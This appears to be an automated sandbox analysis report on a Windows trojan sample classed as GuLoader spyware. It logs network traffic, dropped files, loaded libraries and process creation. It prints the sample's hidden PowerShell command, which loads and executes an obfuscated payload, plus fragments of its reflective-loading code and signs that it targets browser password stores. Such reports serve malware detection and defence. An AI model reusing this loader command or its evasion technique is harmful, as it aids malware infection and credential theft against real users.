Source: powershell.exe, 00000002.00000002.2344675031.0000000005426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2347373016.0000000006338000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000005.00000002.3290429199.00000000214FE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000005.00000002.3290429199.000000002148E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: msiexec.exe, 00000005.00000002.3290429199.00000000214FE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.0000000021524000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.3290429199.00000000214B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000005.00000002.3292249295.0000000022461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000005.00000003.2408195744.00000000058F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2408265004.00000000058F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021631000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000005.00000002.3290429199.0000000021622000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/N
Source: msiexec.exe, 00000005.00000002.3290429199.000000002162C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.5:49828 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.65:443 -> 192.168.2.5:49838 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49966 version: TLS 1.2

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040543E

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe

Jump to dropped file

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040336C

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Code function: 0_2_00404C7B	0_2_00404C7B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_051FDFE0	2_2_051FDFE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004EC146	5_2_004EC146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004ED278	5_2_004ED278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004E5362	5_2_004E5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004EC468	5_2_004EC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004E6498	5_2_004E6498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004ED548	5_2_004ED548
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004EC738	5_2_004EC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004EE988	5_2_004EE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004ECA08	5_2_004ECA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004ECCD8	5_2_004ECCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004E3E09	5_2_004E3E09
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004ECFAA	5_2_004ECFAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004EE97A	5_2_004EE97A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004EF974	5_2_004EF974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004E9DE0	5_2_004E9DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_004E6FC8	5_2_004E6FC8

Source: rPedidoactualizado.exe

Static PE information: invalid certificate

Source: rPedidoactualizado.exe, 00000000.00000002.2059805170.00000000007D4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs rPedidoactualizado.exe
Source: rPedidoactualizado.exe	Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs rPedidoactualizado.exe
Source: rPedidoactualizado.exe.2.dr	Binary or memory string: OriginalFilenameandebryst reneglect.exeDVarFileInfo$ vs rPedidoactualizado.exe

Source: rPedidoactualizado.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/12@5/5

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

0_2_0040336C

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

Code function: 0_2_004046FF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004046FF

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

Code function: 0_2_00402104 CoCreateInstance,

0_2_00402104

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

File created: C:\Users\user\AppData\Local\downrange

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4028:120:WilError_03

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

File created: C:\Users\user\AppData\Local\Temp\nsg1F9A.tmp

Jump to behavior

Source: rPedidoactualizado.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msiexec.exe, 00000005.00000002.3290429199.00000000216EF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: rPedidoactualizado.exe

Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

File read: C:\Users\user\Desktop\rPedidoactualizado.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rPedidoactualizado.exe "C:\Users\user\Desktop\rPedidoactualizado.exe"
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\rPedidoactualizado.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: rPedidoactualizado.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2354527727.0000000008DBD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.2355081498.00000000096B6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Amfetamins152 $Cruelty $Praecoces), (Tagdkninger @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Grundkoncept = [AppDomain]::CurrentDomain.GetAssemblies()$
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Disproportionere221)), $Svmmeturenes).DefineDynamicModule($Rota, $false).DefineType($Brainlessly, $Sentimentaliserede, [System.Multica

Suspicious powershell command line found

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"
Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Chlorin=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Nominalbjning.Zon';$Trichogen169=$Chlorin.SubString(55537,3);.$Trichogen169($Chlorin)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_051FCE82 push eax; mov dword ptr [esp], edx		2_2_051FCE94
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_051FD526 push esp; iretd		2_2_051FD571

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\rPedidoactualizado.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\rPedidoactualizado.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
